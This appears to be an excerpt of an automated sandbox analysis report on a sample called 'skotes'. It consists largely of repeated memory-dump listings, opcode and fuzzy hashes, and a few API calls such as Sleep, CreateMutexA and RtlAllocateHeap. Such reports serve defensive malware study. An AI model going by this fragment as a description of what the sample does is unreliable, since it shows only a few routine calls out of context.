Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5762e783e6a5c6873adf8a8359f3672de72b53c4d89874b11bcb90f105651977
Instruction ID: 4d6c3115b671807d78903f7bafc00b9eef46b4839c95fdb28581d38606fa5d18
Opcode Fuzzy Hash: 5762e783e6a5c6873adf8a8359f3672de72b53c4d89874b11bcb90f105651977
Instruction Fuzzy Hash: 93312831600210DBEB08DB78EDC976DB7F2EF85724F248698E018AB2E5C77599818756

Function 00B29ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 64542a06f996c0c129c94e288a9d73c8018fe28f997d72145110f708b763fb44
Instruction ID: beb8bea6aba74f3d5a143f737e2dd2b78fd6728233c29317a6ca2103e1cdb480
Opcode Fuzzy Hash: 64542a06f996c0c129c94e288a9d73c8018fe28f997d72145110f708b763fb44
Instruction Fuzzy Hash: 08212931604210DBEB189F69FCC976CB7E2EFC5710F2042A9E41C976E5DB769981C712

Function 00B2A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a94d9532f154a5c4f8481ea37b29cd2e85023ded0c1aa1d3ee81389dfea22689
Instruction ID: 2ccc369bdaa2b7e580ccc4c848c93e84a12eb846c2e9dfb15c7a0770c7f01c40
Opcode Fuzzy Hash: a94d9532f154a5c4f8481ea37b29cd2e85023ded0c1aa1d3ee81389dfea22689
Instruction Fuzzy Hash: F7216A71684211DBEB246B69B99A72DB2D2DF81710F2048E6F10C9A2D2CF7689828253

Function 00B2A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00B2A963
CreateMutexA.KERNELBASE(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 92c552425d9854e1e8748f0ea92ec594b87d3888dad5f1e731621d25ea540fd7
Instruction ID: d0fa392a6e01737fdf9048f0fc714cb8b1cdad561ca07a212dd0bc29d5d4ac37
Opcode Fuzzy Hash: 92c552425d9854e1e8748f0ea92ec594b87d3888dad5f1e731621d25ea540fd7
Instruction Fuzzy Hash: 522149316042009BEB18DB68FC8676CB7F2EFD1720F2442A9E41C976D5CB76A6C0C352

Function 00B5D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B5A813,00000001,00000364,00000006,000000FF,?,00B5EE3F,?,00000004,00000000,?,?), ref: 00B5D871

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243070984.0000000000B96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243125761.0000000000B97000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244428735.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2244895761.0000000000CF6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245003817.0000000000D10000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245032950.0000000000D11000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D12000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245520457.0000000000D1B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245768224.0000000000D26000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245837939.0000000000D27000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245874233.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245941980.0000000000D47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2245990171.0000000000D4E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246019735.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246089770.0000000000D59000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246138987.0000000000D5D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246182523.0000000000D5E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246275205.0000000000D67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246311733.0000000000D7A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246342921.0000000000D81000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246436686.0000000000D89000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246464857.0000000000D8D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246491680.0000000000D8E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246556998.0000000000D91000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246582589.0000000000D92000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246611059.0000000000D96000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246665944.0000000000D9E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246696494.0000000000DA0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246724193.0000000000DAE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246790391.0000000000DB2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246817622.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2246971678.0000000000DB5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247008958.0000000000DB6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247106475.0000000000DBE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247236759.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DDE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247284510.0000000000DFC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247808119.0000000000E16000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247884935.0000000000E17000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247913050.0000000000E2C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247943111.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247968841.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2247997624.0000000000E31000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248024106.0000000000E33000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248052321.0000000000E42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2248079383.0000000000E43000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b20000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f4420a48f1ce8a8529dde17144a57c02ba66824834052ae818260d8c8f357da1
Instruction ID: 37f8ba3f3d7d82d00f9efb3b97b6826de2309ae45ac011295c2817e18a015773
Opcode Fuzzy Hash: f4420a48f1ce8a8529dde17144a57c02ba66824834052ae818260d8c8f357da1
Instruction Fuzzy Hash: 4FF0E93160152466DB312A729C01B5B37D8DF55373B1482E1EC04E7181DE60DC0C86E0

Non-executed Functions

Function 00B22EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00B22F5F
__Mtx_unlock.LIBCPMT ref: 00B22FCC
__Cnd_broadcast.LIBCPMT ref: 00B22FE3
__Mtx_unlock.LIBCPMT ref: 00B230F5
__Mtx_unlock.LIBCPMT ref: 00B2319B

Memory Dump Source

Source File: 00000002.00000002.2242682301.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000002.00000002.2242665443.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242682301.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2242989881.0000000000B89000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243010712.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2243031373.0000000000B95000.00000080.00000001.01000000.00000007.sdmpDownload File
